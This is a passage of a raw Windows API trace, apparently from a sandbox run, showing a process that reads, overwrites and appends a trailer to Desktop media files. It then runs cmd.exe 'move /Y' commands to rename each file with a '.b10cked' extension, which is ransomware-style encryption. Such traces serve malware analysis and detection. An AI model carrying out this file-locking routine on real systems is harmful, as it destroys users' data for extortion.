lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xf3ec [0224.066] ReadFile (in: 
hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0224.067] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0224.067] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0224.067] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xf8d4 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xf8d4 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0224.068] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0224.068] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7c69, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7c69, lpOverlapped=0x0) returned 1 [0224.068] SetFilePointer (in: hFile=0x1b4, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0224.068] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7c69, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7c69, lpOverlapped=0x0) returned 1 [0224.069] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-31849, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7c6b [0224.069] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7c69, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7c69, lpOverlapped=0x0) returned 1 [0224.069] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-31849, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7c6b [0224.069] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7c69, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7c69, lpOverlapped=0x0) returned 1 [0224.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kawGr8UmxCuLrfZA.swf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0224.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kawGr8UmxCuLrfZA.swf", cchWideChar=20, lpMultiByteStr=0x13286a4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kawGr8UmxCuLrfZA.swf", lpUsedDefaultChar=0x0) returned 20 [0224.073] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xf8d4 [0224.073] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, 
lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0224.074] CloseHandle (hObject=0x1b4) returned 1 [0224.074] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF") returned 0x25 [0224.075] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0224.075] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF\" \"C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\KAWGR8~1.SWF\" \"C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xd60, dwThreadId=0xcb4)) returned 1 [0224.080] CloseHandle (hObject=0x120) returned 1 [0224.080] CloseHandle (hObject=0x1b4) returned 1 [0224.080] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.080] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0224.080] CompareStringW 
(Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount2=30) returned 1 [0224.080] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.080] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.080] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0224.080] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.080] ReleaseMutex (hMutex=0xf8) returned 1 [0224.080] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.080] ReleaseMutex (hMutex=0xf8) returned 1 [0224.080] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.080] ReleaseMutex (hMutex=0xf8) returned 1 [0224.080] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.080] ReleaseMutex (hMutex=0xf8) returned 1 [0224.080] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggma p_oiocedo08.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0224.081] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28086999215) returned 1 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xac49 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 
0xac49 [0224.081] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xac49 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.082] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xa761 [0224.083] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xac49 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0224.084] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xac49 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0224.084] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0224.084] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5623, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5623, lpOverlapped=0x0) returned 1 [0224.085] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0224.085] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5623, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5623, lpOverlapped=0x0) returned 1 [0224.085] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-22051, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5626 [0224.085] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5623, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5623, lpOverlapped=0x0) returned 1 [0224.085] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-22051, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5626 [0224.085] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x5623, lpNumberOfBytesWritten=0x12ec1c, 
lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x5623, lpOverlapped=0x0) returned 1 [0224.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="e-AggmA P_oioCEdo08.mkv", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0224.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="e-AggmA P_oioCEdo08.mkv", cchWideChar=23, lpMultiByteStr=0x13286a4, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e-AggmA P_oioCEdo08.mkv", lpUsedDefaultChar=0x0) returned 23 [0224.163] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xac49 [0224.163] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0224.163] CloseHandle (hObject=0x1b4) returned 1 [0224.164] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV") returned 0x2a [0224.165] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\") returned 0x1e [0224.165] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, 
lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x55c, dwThreadId=0xf94)) returned 1 [0224.260] CloseHandle (hObject=0x120) returned 1 [0224.260] CloseHandle (hObject=0x1b4) returned 1 [0224.261] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\") returned 0x1e [0224.261] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0224.261] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\", cchCount1=30, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount2=30) returned 3 